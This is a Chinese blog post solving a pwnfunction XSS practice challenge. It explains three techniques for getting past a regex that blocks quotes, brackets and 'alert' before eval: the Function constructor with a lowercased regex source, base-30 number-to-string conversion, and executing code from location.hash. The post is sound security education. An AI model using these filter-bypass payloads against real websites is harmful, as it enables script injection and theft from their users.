XSS-过滤特殊符号的正则绕过

于 2024-08-17 23:09:12 发布
阅读量351 收藏 3
点赞数 3
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78549931/article/details/141285692
版权

靶场网址:https://xss.pwnfunction.com/

题目源码:

    mafia = (new URL(location).searchParams.get('mafia') || '1+1')
    mafia = mafia.slice(0, 50)
    mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
    mafia = mafia.replace(/alert/g, '_')
    eval(mafia)

 分析代码:

根据源码可以分析出,过滤了`, ', ",+,-,!,\,[,]并且过滤了弹窗函数alert,这样的一个正则,如果去绕过它呢?

首先我们必须知道,弹窗最常用的三个函数,为alert、prompt、confirm,三个函数都能实现弹窗,那么第一个绕过的payload简单的有些过分:

payload:prompt(1337);

payload:confirm(1337);

因为这里是作者编写的失误,所以导致绕过过于简单,实际上过滤了alert也会过滤掉其他弹窗函数 。所以上述解法不算做今天讲的重点。

解法一:构造函数

var add = new Function(
	'x',
	'y',
	'return x+y'
);

等同于:

function add(x,y){
	return x+y;
}

如何执行: 

Function()()

 因为JavaScript是严格区分大小写的,所以我们可以将大写的ALERT转为小写然后执行:

Function(/ALERT(1337)/.source.toLowerCase())()

 

代码执行成功!

解法二:使用eval函数绕过限制 

这里用到了js中的一个函数:

parseInt(*string*, *radix*): 解析一个字符串并返回指定基数的十进制整数, radix 是2-36之间的整数,表示被解析字符串的基数。

  • string

    要被解析的值。如果参数不是一个字符串,则将其转换为字符串(使用 ToString抽象操作)。字符串开头的空白符将会被忽略。

  • radix 可选

    236,表示字符串的基数。例如指定 16 表示被解析值是十六进制数。请注意,10不是默认值!

示例: 

parseInt('123', 5) // 将'123'看作5进制数,返回十进制数38 => 1*5^2 + 2*5^1 + 3*5^0 = 38

 所以我们可以将alert先用三十进制转换为数字,然后再转回为字符串,

至于为什么是三十进制:0-9占十位,a-t占二十位,如果小于三十进制的话,当它从数字转回为字符串时,字符会丢失(例如:asert用29进制转换为数字,然后再转回为字符串时会变为aser,少了一个t),转回字符串的原因:数字无法运行。

所以我们这里得用三十进制:

parseInt('alert', 30)

结果为数字8680439也就是说我们利用parseInt函数将关键字变为一串数字,但数字肯定无法运行,我们还需要再变回去,要将一个数字转换为特定的 radix 中的字符串字段,要使用 thatNumber.toString(radix)函数。

8680439..toString(30) === alert

注意:转为tostring方法中间为.. 

所以最终的payload为:

eval(8680439..toString(30))(1337)

代码执行成功! 

解法三:利用location中的hash来绕过关键字

先来学习一下URL的组成:

var url = document.createElement('a');
url.href = 'https://developer.mozilla.org/en-US/search?q=URL#search-results-close-container';
console.log(url.href);      // https://developer.mozilla.org/en-US/search?q=URL#search-results-close-container
console.log(url.protocol);  // https:
console.log(url.host);      // developer.mozilla.org
console.log(url.hostname);  // developer.mozilla.org
console.log(url.port);      // (blank - https assumes port 443)
console.log(url.pathname);  // /en-US/search
console.log(url.search);    // ?q=URL
console.log(url.hash);      // #search-results-close-container
console.log(url.origin);    // https://developer.mozilla.org

我们可以看到location.hash是取url中#后面的部分  ,而#后面的部分不会算作get传参的内容,所以我们可以将代码写在location.hash的位置,然后用eval函数来执行。

注意:location.hash第一个位置是#,所以我们还得使用一个slice函数来进行切割:

slice(index),index为索引

所以最终的payload为:

eval(location.hash.slice(1))#alert(1337)

代码执行成功! 

半ོ糖ོ
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss绕过字符过滤_XSS绕过实战练习
weixin_39640203的博客
12-21 705
前言写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下。有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战平台进行实现。level1未进行过滤,直接输入payloadpayload:alert(/xss/)level2发现对html特殊符号进行了实体编码,失效,但是发现下面input标签里还有一个输出点,可...
PHP过滤★等特殊符号正则
10-26
5. 防止SQL注入与XSS攻击:过滤特殊符号的直接目的是为了防止SQL注入和跨站脚本攻击(XSS)。SQL注入攻击通过恶意SQL代码插入数据库操作,从而获取、修改或删除敏感数据。而XSS攻击则是利用用户浏览器执行恶意脚本。...
3-10xss绕过思路讲解和案例演示
山兔的博客
04-28 619
XSS绕过-过滤-转换 因为在我们的实际测试过程中,有很多安全系统或多或少,会去做一些安全措施,但是,这些措施,有可能会因为程序员逻辑不够严谨,或者他使用的方法是错的,保证了他的措施起到了一部分作用,但是还是可以被绕过的 0,前端限制绕过,直接抓包重放,或者修改html前端代码 我们的安全措施不要在前端去做,比如输入字符长度限制,这样也引申出一个思想,我们所有的安全措施,永远不要放在前端去做,前端会通过js,会通过属性,起到安全的辅助措施,但是本质上是没有作用的 1.大小写,比如:<SCRIPT&g
XSS绕过XSS过滤速查,XSS绕过姿势
wswokao的博客
09-04 5278
1.介绍 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWASP维护和完善它。OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Chea...
xss过滤总结
weixin_42109829的博客
12-04 3383
一。简述 一。简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序. 例如: 1.盗用cookie,获取敏感信息。 2.利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。 3.利用iframe、frame、XMLHttpRequest或上述Flash等方式,以...
XSS过滤绕过速查表
weixin_50464560的博客
03-07 3771
写在前面:第一次翻译长篇文档,如有疏漏还请各位大牛指正。OWASP的这篇速查表虽然时间比较久了,但还在更新,所以还是翻译出来了。翻译完发现里面还是有一些值得借鉴的思路,用来涨知识还是可以的。由于篇幅较长,推荐各位可以收藏起来,用的时候再来查= ̄ω ̄=1.介绍这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWAS
XSS-Stored
diemozao8175的博客
08-22 210
存储型XSS (持久性XSS) 将恶意JavaScript代码存储在数据库,当下次用户浏览的时候执行 Low <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = t...
XSS绕过实战练习
weixin_50464560的博客
05-07 868
XSS绕过实战练习 前言 写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下。有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战平台进行实现。 level1 未进行过滤,直接输入payloadpayload:<script>alert(/xss/)</script> level2 发现对html特殊符号进行了实体编码,<script&g...
web渗透测试----31、检测到绕过web应用防火墙
七天
12-15 4977
WAF(web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 文章目录一、WAF的工作原理二、WAF的常见功能三、WAF种类四、WAF的判断五、WAF的绕过六、WAF指纹七、部分WAF指纹 一、WAF的工作原理 WAF工作在web服务器之前,对基于HTTP/HTTPS协议的通信进行检测和识别。在用户请求到达web服务器前对用户请求进行扫描和过滤,分析并校验每个用户请求的网络包,确保每个用户的请求安全且有效,对无效或有攻击行为的请求进行阻断或隔离。
XSS-haozi
个人博客
08-10 363
https://xss.haozi.me/ XSS学习 github项目地址:haozi/xss-demo: ????????‍♂️ xss 攻防靶场,issues 有答案 (github.com) 0x00 server code function render (input) { return '<div>' + input + '</div>' } payload <script>alert(1)</script> 未做处理 0x01 ser
防止xss和sql注入:JS特殊字符过滤正则
12-01
有些攻击者可能会使用编码或转义技术绕过这种简单的过滤。为了更全面地防止XSS,应当结合其他防御措施,如使用Content Security Policy (CSP)、输入验证、HTML编码、输出编码等。 对于SQL注入,预防的最佳做法是...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
js中过滤特殊字符的正则表达式
10-28
### 校验输入域是否含有特殊符号 另一个函数 `checkAllTextValid` 展示了如何在表单中遍历所有的文本框输入域,来检查是否含有不允许的特殊字符。该函数使用正则表达式来校验每个文本域的值。如果文本域中存在特殊...
XSS盲打与cookie劫持
m0_74249600的博客
08-14 849
本文紧接上篇文章讲述了XSS盲打、cookie劫持以及靶场实践,请关注持续更新(本文部分内容来自课件,如有版权问题请与我联系)
XSS的DOM破坏
m0_67441173的博客
08-17 523
@keyframes x{}
反射型XSS的几种payload
m0_70638961的博客
08-17 321
符合web的解码顺序,所以可以被执行。和数据只能有文本,不会有HTML解码和URL解码操作和里会有HTML解码操作,但不会有子元素其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作部分属性(如href)会有URL解码操作,但URL中的协议需为ASCIIJavaScript会对字符串和标识符Unicode解码根据浏览器的自动解码,反向构造 XSS Payload 即可。
xss.pwnfunction-Easy
最新发布
banliyaoguai的博客
08-17 404
然后要获取prototype携带的toString方法,且不能是Object.prototype下的字符串方法,因为后者返回的是一个元素,我们需要的是可控的字符串。然后你是用上面的两个属性弹窗一个属性就会以字符串的形式展示href里面的值,如果你用的是从object继承来的toString,就会返回一个对象,例子如下。我们看到innerHTML可以想到使用img标签,然后看到过滤了括号我们可以尝试使用location,然后使用%25编码%绕过()它匹配字符串 "ALERT(1337)"。
XSS跨站脚本攻击
m0_71864767的博客
08-16 795
\u0031\u0032在解码的时候会被解码为字符串`12`,注意是字符串,不是数字,文字显然是需要引号的,JS执行失败。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS可以解析Unicode的编码。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS可以解析Unicode的编码。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS也认不出来,执行失败。#是RCDATA元素,可以容纳文本和字符引用,不能容纳其他元素。
防止xss攻击的特殊字符正则
05-26
防止 XSS 攻击的特殊字符正则表达式可以是以下之一: 1. 只允许数字和字母:`^[a-zA-Z0-9]+$` 2. 允许数字、字母和部分符号:`^[a-zA-Z0-9!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;"'<>,\.?/\`\~]+$` 3. 允许中文、数字、字母和部分符号:`^[\u4E00-\u9FA5a-zA-Z0-9!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;"'<>,\.?/\`\~]+$` 这些正则表达式可以用于客户端验证输入的内容,以防止恶意脚本被插入到 HTML 中。但是,为了更完善的防止 XSS 攻击,还需要在服务端对输入的内容进行过滤和转义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值